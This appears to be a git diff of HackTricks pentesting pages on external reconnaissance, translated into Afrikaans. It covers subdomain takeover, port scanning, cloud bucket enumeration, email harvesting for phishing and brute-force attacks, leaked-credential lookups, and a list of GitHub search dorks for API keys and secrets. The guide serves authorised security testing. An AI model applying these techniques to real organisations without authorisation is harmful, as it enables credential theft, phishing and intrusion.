Kyk vir moontlike [**subdomein-oorgawes**](../../pentesting-web/domain-subdomain-takeover.md#subdomain-takeover).\
As die **subdomein** na 'n **S3-emmer** verwys, [**kontroleer die toestemmings**](../../network-services-pentesting/pentesting-web/buckets/).
Check for possible [**subdomain takeovers**](../../pentesting-web/domain-subdomain-takeover.md#subdomain-takeover).\
If the **subdomain** is pointing to some **S3 bucket**, [**check the permissions**](../../network-services-pentesting/pentesting-web/buckets/).
As jy enige **subdomein met 'n ander IP** as diegene wat jy reeds in die batesontdekking gevind het, moet jy 'n **basiese kwesbaarheidsskandering** (met behulp van Nessus of OpenVAS) en 'n paar [**poortskenning**](../pentesting-network/#discovering-hosts-from-the-outside) doen met **nmap/masscan/shodan**. Afhangende van watter dienste loop, kan jy in **hierdie boek 'n paar truuks vind om hulle te "aanval"**.\
Merk op dat die subdomein soms gehuisves word binne 'n IP wat nie deur die kliënt beheer word nie, so dit is nie binne die omvang nie, wees versigtig.
If you find any **subdomain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\
_Note that sometimes the subdomain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._
## IP's
## IPs
In die aanvanklike stappe het jy dalk **sekere IP-reekse, domeine en subdomeine gevind**.\
Dit is tyd om al die IP's van daardie reekse te **versamel** en vir die **domeine/subdomeine (DNS-navrae)**.
In the initial steps you might have **found some IP ranges, domains and subdomains**.\
Its time to **recollect all the IPs from those ranges** and for the **domains/subdomains (DNS queries).**
Using services from the following **free apis** you can also find **previous IPs used by domains and subdomains**. These IPs might still be owned by the client (and might allow you to find [**CloudFlare bypasses**](../../network-services-pentesting/pentesting-web/uncovering-cloudflare.md))
Deur dienste van die volgende **gratis API's** te gebruik, kan jy ook **vorige IP's wat deur domeine en subdomeine gebruik is**, vind. Hierdie IP's mag steeds deur die kliënt besit word (en mag jou in staat stel om [**CloudFlare-omseilings**](../../network-services-pentesting/pentesting-web/uncovering-cloudflare.md) te vind)
* [**https://securitytrails.com/**](https://securitytrails.com/)
You can also check for domains pointing a specific IP address using the tool [**hakip2host**](https://github.com/hakluke/hakip2host)
Jy kan ook vir domeine wat na 'n spesifieke IP-adres verwys, kyk deur die hulpmiddel [**hakip2host**](https://github.com/hakluke/hakip2host) te gebruik.
### **Looking for vulnerabilities**
### **Op soek na kwesbaarhede**
**Port scan all the IPs that doesnt belong to CDNs** (as you highly probably wont find anything interested in there). In the running services discovered you might be **able to find vulnerabilities**.
**Poortsken al die IP's wat nie aan CDN's behoort nie** (aangesien jy waarskynlik niks interessants daar sal vind nie). In die ontdekte lopende dienste kan jy **kwesbaarhede vind**.
**Find a** [**guide**](../pentesting-network/) **about how to scan hosts.**
**Vind 'n** [**gids**](../pentesting-network/) **oor hoe om gasheer te skandeer.**
## Web servers hunting
## Soek na webbedieners
> We have found all the companies and their assets and we know IP ranges, domains and subdomains inside the scope. It's time to search for web servers.
> Ons het al die maatskappye en hul bates gevind en ons ken IP-reekse, domeine en subdomeine binne die omvang. Dit is tyd om na webbedieners te soek.
In the previous steps you have probably already performed some **recon of the IPs and domains discovered**, so you may have **already found all the possible web servers**. However, if you haven't we are now going to see some **fast tricks to search for web servers** inside the scope.
In die vorige stappe het jy waarskynlik al 'n bietjie **rekognisering van die ontdekte IP's en domeine** gedoen, so jy het dalk **al die moontlike webbedieners al gevind**. As jy dit egter nie gedoen het nie, gaan ons nou kyk na 'n paar **vinnige truuks om na webbedieners** binne die omvang te soek.
Please, note that this will be **oriented for web apps discovery**, so you should **perform the vulnerability** and **port scanning** also (**if allowed** by the scope).
A **fast method** to discover **ports open** related to **web** servers using [**masscan** can be found here](../pentesting-network/#http-port-discovery).\
Another friendly tool to look for web servers is [**httprobe**](https://github.com/tomnomnom/httprobe)**,** [**fprobe**](https://github.com/theblackturtle/fprobe) and [**httpx**](https://github.com/projectdiscovery/httpx). You just pass a list of domains and it will try to connect to port 80 (http) and 443 (https). Additionally, you can indicate to try other ports:
Let asseblief daarop dat dit **georiënteer sal wees vir die ontdekking van webtoepassings**, so jy moet ook die **kwesbaarheid** en **poortskenning** uitvoer (**as toegelaat** deur die omvang).
'n **Vinnige metode** om **oop poorte** wat verband hou met **webbedieners** te ontdek deur gebruik te maak van [**masscan** kan hier gevind word](../pentesting-network/#http-port-discovery).\
'n Ander vriendelike hulpmiddel om na webbedieners te soek is [**httprobe**](https://github.com/tomnomnom/httprobe)**,** [**fprobe**](https://github.com/theblackturtle/fprobe) en [**httpx**](https://github.com/projectdiscovery/httpx). Jy stuur net 'n lys domeine en dit sal probeer om aan te sluit by poort 80 (http) en 443 (https). Daarbenewens kan jy aandui om ander poorte te probeer:
```bash
cat /tmp/domains.txt | httprobe #Test all domains inside the file for port 80 and 443
cat /tmp/domains.txt | httprobe -p http:8080 -p https:8443 #Check port 80, 443 and 8080 and 8443
```
### **Skermfoto's**
### **Screenshots**
Nou dat jy al die webbedieners in die omvang ontdek het (onder die IP-adresse van die maatskappy en al die domeine en subdomeine), weet jy waarskynlik nie waar om te begin nie. So, maak dit eenvoudig en begin net deur skermfoto's van almal te neem. Deur net na die hoofbladsy te kyk, kan jy vreemde eindpunte vind wat meer geneig is om kwesbaar te wees.
Now that you have discovered **all the web servers** present in the scope (among the **IPs** of the company and all the **domains** and **subdomains**) you probably **don't know where to start**. So, let's make it simple and start just taking screenshots of all of them. Just by **taking a look** at the **main page** you can find **weird** endpoints that are more **prone** to be **vulnerable**.
Om die voorgestelde idee uit te voer, kan jy [EyeWitness](https://github.com/FortyNorthSecurity/EyeWitness), [HttpScreenshot](https://github.com/breenmachine/httpscreenshot), [Aquatone](https://github.com/michenriksen/aquatone), [Shutter](https://shutter-project.org/downloads/third-party-packages/) of [webscreenshot](https://github.com/maaaaz/webscreenshot) gebruik.
To perform the proposed idea you can use [**EyeWitness**](https://github.com/FortyNorthSecurity/EyeWitness), [**HttpScreenshot**](https://github.com/breenmachine/httpscreenshot), [**Aquatone**](https://github.com/michenriksen/aquatone), [**Shutter**](https://shutter-project.org/downloads/third-party-packages/) or [**webscreenshot**](https://github.com/maaaaz/webscreenshot)**.**
Verder kan jy dan [eyeballer](https://github.com/BishopFox/eyeballer) gebruik om deur al die skermfoto's te loop om jou te vertel wat waarskynlik kwesbaarhede bevat, en wat nie.
Moreover, you could then use [**eyeballer**](https://github.com/BishopFox/eyeballer) to run over all the **screenshots** to tell you **what's likely to contain vulnerabilities**, and what isn't.
## Openbare Cloud Bates
## Public Cloud Assets
Om potensiële cloud bates wat aan 'n maatskappy behoort, te vind, moet jy begin met 'n lys sleutelwoorde wat daardie maatskappy identifiseer. Byvoorbeeld, vir 'n kriptomaatskappy kan jy woorde soos "crypto", "wallet", "dao", "<domain_name>", "<subdomain_names>" gebruik.
In order to find potential cloud assets belonging to a company you should **start with a list of keywords that identify that company**. For example, a crypto for a crypto company you might use words such as: `"crypto", "wallet", "dao", "<domain_name>", <"subdomain_names">`.
You will also need wordlists of **common words used in buckets**:
Jy sal ook woordlyste van algemene woorde wat in emmers gebruik word, benodig:
* [https://raw.githubusercontent.com/cujanovic/goaltdns/master/words.txt](https://raw.githubusercontent.com/cujanovic/goaltdns/master/words.txt)
* [https://raw.githubusercontent.com/infosec-au/altdns/master/words.txt](https://raw.githubusercontent.com/infosec-au/altdns/master/words.txt)
* [https://raw.githubusercontent.com/jordanpotti/AWSBucketDump/master/BucketNames.txt](https://raw.githubusercontent.com/jordanpotti/AWSBucketDump/master/BucketNames.txt)
Then, with those words you should generate **permutations** (check the [**Second Round DNS Brute-Force**](./#second-dns-bruteforce-round) for more info).
Met daardie woorde moet jy dan permutasies genereer (sien die [Tweede Ronde DNS Brute-Force](./#second-dns-bruteforce-round) vir meer inligting).
With the resulting wordlists you could use tools such as [**cloud\_enum**](https://github.com/initstring/cloud\_enum)**,** [**CloudScraper**](https://github.com/jordanpotti/CloudScraper)**,** [**cloudlist**](https://github.com/projectdiscovery/cloudlist) **or** [**S3Scanner**](https://github.com/sa7mon/S3Scanner)**.**
Met die resulterende woordlyste kan jy gereedskap soos [cloud_enum](https://github.com/initstring/cloud_enum), [CloudScraper](https://github.com/jordanpotti/CloudScraper), [cloudlist](https://github.com/projectdiscovery/cloudlist) of [S3Scanner](https://github.com/sa7mon/S3Scanner) gebruik.
Remember that when looking for Cloud Assets you should l**ook for more than just buckets in AWS**.
Onthou dat wanneer jy na Cloud Bates soek, jy na meer as net emmers in AWS moet kyk.
### **Looking for vulnerabilities**
### **Op soek na kwesbaarhede**
If you find things such as **open buckets or cloud functions exposed** you should **access them** and try to see what they offer you and if you can abuse them.
As jy dinge soos oop emmers of blootgestelde cloudfunksies vind, moet jy toegang daartoe verkry en probeer sien wat hulle bied en of jy dit kan misbruik.
## Emails
## E-posse
With the **domains** and **subdomains** inside the scope you basically have all what you **need to start searching for emails**. These are the **APIs** and **tools** that have worked the best for me to find emails of a company:
Met die domeine en subdomeine binne die omvang het jy basies alles wat jy nodig het om na e-posse te soek. Hier is die API's en gereedskap wat die beste vir my gewerk het om e-posse van 'n maatskappy te vind:
* [**theHarvester**](https://github.com/laramies/theHarvester) - with APIs
* API of [**https://hunter.io/**](https://hunter.io/) (free version)
* API of [**https://app.snov.io/**](https://app.snov.io/) (free version)
* API of [**https://minelead.io/**](https://minelead.io/) (free version)
* [theHarvester](https://github.com/laramies/theHarvester) - met API's
* API van [https://hunter.io/](https://hunter.io/) (gratis weergawe)
* API van [https://app.snov.io/](https://app.snov.io/) (gratis weergawe)
* API van [https://minelead.io/](https://minelead.io/) (gratis weergawe)
### **Looking for vulnerabilities**
### **Op soek na kwesbaarhede**
Emails will come handy later to **brute-force web logins and auth services** (such as SSH). Also, they are needed for **phishings**. Moreover, these APIs will give you even more **info about the person** behind the email, which is useful for the phishing campaign.
E-posse sal later handig wees om webaanmeldings en outentiseringsdienste (soos SSH) met brute force aan te val. Hulle is ook nodig vir hengelpraktyke. Verder sal hierdie API's jou selfs meer inligting gee oor die persoon agter die e-pos, wat nuttig is vir die hengelveldtog.
## Credential Leaks
## Kredensialek
With the **domains,** **subdomains**, and **emails** you can start looking for credentials leaked in the past belonging to those emails:
Met die domeine, subdomeine en e-posse kan jy begin soek na kredensiale wat in die verlede uitgelek het en aan daardie e-posse behoort:
* [https://leak-lookup.com](https://leak-lookup.com/account/login)
* [https://www.dehashed.com/](https://www.dehashed.com/)
### **Looking for vulnerabilities**
### **Op soek na kwesbaarhede**
If you find **valid leaked** credentials, this is a very easy win.
As jy geldige uitgelekte kredensiale vind, is dit 'n baie maklike oorwinning.
## Secrets Leaks
## Geheimlek
Credential leaks are related to hacks of companies where **sensitive information was leaked and sold**. However, companies might be affected for **other leaks** whose info isn't in those databases:
Kredensialeks is verband hou met hacks van maatskappye waarby sensitiewe inligting uitgelek en verkoop is. Maatskappye kan egter deur ander lekke geraak word waarvan die inligting nie in daardie databasisse is nie:
### Github Leaks
### Github-lekke
Credentials and APIs might be leaked in the **public repositories** of the **company** or of the **users** working by that github company.\
You can use the **tool** [**Leakos**](https://github.com/carlospolop/Leakos) to **download** all the **public repos** of an **organization** and of its **developers** and run [**gitleaks**](https://github.com/zricethezav/gitleaks) over them automatically.
Kredensiale en API's kan uitgelek word in die openbare bewaarplekke van die maatskappy of van die gebruikers wat vir daardie Github-maatskappy werk. Jy kan die gereedskap [Leakos](https://github.com/carlospolop/Leakos) gebruik om al die openbare bewaarplekke van 'n organisasie en sy ontwikkelaars af te laai en outomaties [gitleaks](https://github.com/zricethezav/gitleaks) daaroor te hardloop.
**Leakos** can also be used to run **gitleaks** agains all the **text** provided **URLs passed** to it as sometimes **web pages also contains secrets**.
Leakos kan ook gebruik word om gitleaks teen al die teksverskaffings-URL's wat aan hom oorgedra word, te hardloop, aangesien webbladsye soms ook geheime bevat.
#### Github Dorks
Check also this **page** for potential **github dorks** you could also search for in the organization you are attacking:
Kyk ook na hierdie bladsy vir potensiële Github Dorks wat jy ook in die organisasie wat jy aanval, kan soek:
{% content-ref url="github-leaked-secrets.md" %}
[github-leaked-secrets.md](github-leaked-secrets.md)
{% endcontent-ref %}
### Pastes Leaks
### Pastes-lekke
Sometimes attackers or just workers will **publish company content in a paste site**. This might or might not contain **sensitive information**, but it's very interesting to search for it.\
You can use the tool [**Pastos**](https://github.com/carlospolop/Pastos) to search in more that 80 paste sites at the same time.
Soms sal aanvallers of net werkers maatskappy-inhoud op 'n plakkerswebwerf publiseer. Dit mag wel of nie sensitiewe inligting bevat nie, maar dit is baie interessant om daarna te soek. Jy kan die gereedskap [Pastos](https://github.com/carlospolop/Pastos) gebruik om gelyktydig in meer as 80 plakkerswebwerwe te soek.
### Google Dorks
Old but gold google dorks are always useful to find **exposed information that shouldn't be there**. The only problem is that the [**google-hacking-database**](https://www.exploit-db.com/google-hacking-database) contains several **thousands** of possible queries that you cannot run manually. So, you can get your favourite 10 ones or you could use a **tool such as** [**Gorks**](https://github.com/carlospolop/Gorks) **to run them all**.
Ou maar goeie Google Dorks is altyd nuttig om blootgestelde inligting wat nie daar behoort te wees nie, te vind. Die enigste probleem is dat die [google-hacking-database](https://www.exploit-db.com/google-hacking-database) verskeie duisende moontlike navrae bevat wat jy nie handmatig kan hardloop nie. Jy kan dus jou gunsteling 10 kies of 'n gereedskap soos [Gorks](https://github.com/carlospolop/Gorks) gebruik om hulle almal uit te voer.
_Note that the tools that expect to run all the database using the regular Google browser will never end as google will block you very very soon._
Merk op dat die gereedskap wat verwag dat jy die hele databasis met die gewone Google-webblaaier hardloop, nooit sal eindig nie, aangesien Google jou baie baie gou sal blokkeer.
### **Looking for vulnerabilities**
### **Op soek na kwesbaarhede**
If you find **valid leaked** credentials or API tokens, this is a very easy win.
As jy geldige uitgelekte kredensiale of API-tokens vind, is dit 'n baie maklike oorwinning.
## Public Code Vulnerabilities
## Openbare Kodekwesbaarhede
If you found that the company has **open-source code** you can **analyse** it and search for **vulnerabilities** on it.
As jy vind dat die maatskappy oopbronkode het, kan jy dit analiseer en soek na kwesbaarhede daarin.
**Depending on the language** there are different **tools** you can use:
Afhanklik van die taal is daar verskillende gereedskap wat jy kan gebruik:
{% content-ref url="../../network-services-pentesting/pentesting-web/code-review-tools.md" %}
[code-review-tools.md](../../network-services-pentesting/pentesting-web/code-review-tools.md)
{% endcontent-ref %}
There are also free services that allow you to **scan public repositories**, such as:
Daar is ook gratis dienste wat jou in staat stel om openbare bewaarplekke te skandeer, soos:
* [**Snyk**](https://app.snyk.io/)
* [Snyk](https://app.snyk.io/)
## [**Pentesting Web Metodologie**](../../network-services-pentesting/pentesting-web/)
## [**Pentesting Web Methodology**](../../network-services-pentesting/pentesting-web/)
Die **meerderheid van die kwesbaarhede** wat deur foutsoekers gevind word, is binne **webtoepassings**, so op hierdie punt wil ek graag praat oor 'n **webtoepassingstoetsmetodologie**, en jy kan [**hierdie inligting hier vind**](../../network-services-pentesting/pentesting-web/).
The **majority of the vulnerabilities** found by bug hunters resides inside **web applications**, so at this point I would like to talk about a **web application testing methodology**, and you can [**find this information here**](../../network-services-pentesting/pentesting-web/).
Ek wil ook 'n spesiale vermelding maak van die afdeling [**Web Geoutomatiseerde Skanderings oopbronhulpmiddels**](../../network-services-pentesting/pentesting-web/#automatic-scanners), want alhoewel jy nie moet verwag dat hulle baie sensitiewe kwesbaarhede sal vind nie, is hulle handig om hulle te implementeer in **werkstrome om 'n aanvanklike webinligting te verkry.**
I also want to do a special mention to the section [**Web Automated Scanners open source tools**](../../network-services-pentesting/pentesting-web/#automatic-scanners), as, if you shouldn't expect them to find you very sensitive vulnerabilities, they come handy to implement them on **workflows to have some initial web information.**
## Opsomming
## Recapitulation
> Gelukwens! Op hierdie punt het jy reeds **alle basiese opname** uitgevoer. Ja, dit is basies omdat daar nog baie meer opname gedoen kan word (ons sal later meer truuks sien).
> Congratulations! At this point you have already perform **all the basic enumeration**. Yes, it's basic because a lot more enumeration can be done (will see more tricks later).
Jy het reeds:
So you have already:
1. Al die **maatskappye** binne die omvang gevind
2. Al die **bates** wat aan die maatskappye behoort, gevind (en 'n paar kwesbaarheidsskanderings uitgevoer as dit binne die omvang val)
3. Al die **domeine** wat aan die maatskappye behoort, gevind
4. Al die **subdomeine** van die domeine gevind (enige subdomein-oorgawe?)
5. Al die **IP's** (van en **nie van CDN's**) binne die omvang gevind.
6. Al die **webbedieners** gevind en 'n **skermkiekie** van hulle geneem (enige iets vreemds wat 'n dieper kyk werd is?)
7. Al die **potensiële openbare wolkbates** wat aan die maatskappy behoort, gevind.
8. **E-posse**, **geloofsbriewe-lekke** en **geheimlekkasies** wat jou 'n **groot wen baie maklik** kan gee.
9. **Pentesting van al die webwerwe wat jy gevind het**
1. Found all the **companies** inside the scope
2. Found all the **assets** belonging to the companies (and perform some vuln scan if in scope)
3. Found all the **domains** belonging to the companies
4. Found all the **subdomains** of the domains (any subdomain takeover?)
5. Found all the **IPs** (from and **not from CDNs**) inside the scope.
6. Found all the **web servers** and took a **screenshot** of them (anything weird worth a deeper look?)
7. Found all the **potential public cloud assets** belonging to the company.
8. **Emails**, **credentials leaks**, and **secret leaks** that could give you a **big win very easily**.
9. **Pentesting all the webs you found**
## **Volledige Opname Outomatiese Hulpmiddels**
## **Full Recon Automatic Tools**
There are several tools out there that will perform part of the proposed actions against a given scope.
Daar is verskeie hulpmiddels beskikbaar wat 'n deel van die voorgestelde aksies teen 'n gegewe omvang sal uitvoer.
* [**https://github.com/yogeshojha/rengine**](https://github.com/yogeshojha/rengine)
* [**https://github.com/j3ssie/Osmedeus**](https://github.com/j3ssie/Osmedeus)
* [**https://github.com/six2dez/reconftw**](https://github.com/six2dez/reconftw)
* [**https://github.com/hackerspider1/EchoPwn**](https://github.com/hackerspider1/EchoPwn) - A little old and not updated
* [**https://github.com/hackerspider1/EchoPwn**](https://github.com/hackerspider1/EchoPwn) - 'n Bietjie oud en nie opgedateer nie
## **References**
## **Verwysings**
* All free courses of [**@Jhaddix**](https://twitter.com/Jhaddix) like [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI)
* Alle gratis kursusse van [**@Jhaddix**](https://twitter.com/Jhaddix) soos [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI)
<img src="../../.gitbook/assets/i3.png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty-platform wat deur hackers geskep is, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) en begin om belonings tot **$100,000** te verdien!
{% embed url="https://go.intigriti.com/hacktricks" %}
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>

38
generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md
View file

@ -2,30 +2,30 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
<img src="../../.gitbook/assets/i3.png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty-platform geskep deur hackers, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin verdien belonings tot **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
Now that we have built the list of assets of our scope it's time to search for some OSINT low-hanging fruits.
Nou dat ons die lys van bates in ons omvang gebou het, is dit tyd om te soek na sommige OSINT-laaghangende vrugte.
### Platforms that already searched for leaks
### Platforms wat reeds na lekke gesoek het
* [https://trufflesecurity.com/blog/introducing-forager/](https://trufflesecurity.com/blog/introducing-forager/)
### Api keys leaks in github
### Api-sleutellekke in github
* [https://github.com/dxa4481/truffleHog](https://github.com/dxa4481/truffleHog)
* [https://github.com/gitleaks/gitleaks](https://github.com/gitleaks/gitleaks)
@ -40,7 +40,6 @@ Now that we have built the list of assets of our scope it's time to search for s
* [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker)
### **Dorks**
```bash
".mlab.com password"
"access_key"
@ -322,17 +321,16 @@ GCP SECRET
AWS SECRET
"private" extension:pgp
```
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
</details>

46
generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md
View file

@ -1,43 +1,43 @@
# Wide Source Code Search
# Wydse Bronkode Soektog
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>
The goal of this page is to enumerate **platforms that allow to search for code** (literal or regex) in across thousands/millions of repos in one or more platforms.
Die doel van hierdie bladsy is om **platforms op te som wat soektogte vir kode** (letterlik of regex) in duisende/miljoene opslagplekke op een of meer platforms toelaat.
This helps in several occasions to **search for leaked information** or for **vulnerabilities** patterns.
Dit help in verskeie gevalle om te **soek na uitgelekde inligting** of na **kwesbaarheidspatrone**.
* [**SourceGraph**](https://sourcegraph.com/search): Search in millions of repos. There is a free version and an enterprise version (with 15 days free). It supports regexes.
* [**Github Search**](https://github.com/search): Search across Github. It supports regexes.
* Maybe it's also useful to check also [**Github Code Search**](https://cs.github.com/).
* [**Gitlab Advanced Search**](https://docs.gitlab.com/ee/user/search/advanced\_search.html): Search across Gitlab projects. Support regexes.
* [**SearchCode**](https://searchcode.com/): Search code in millions of projects.
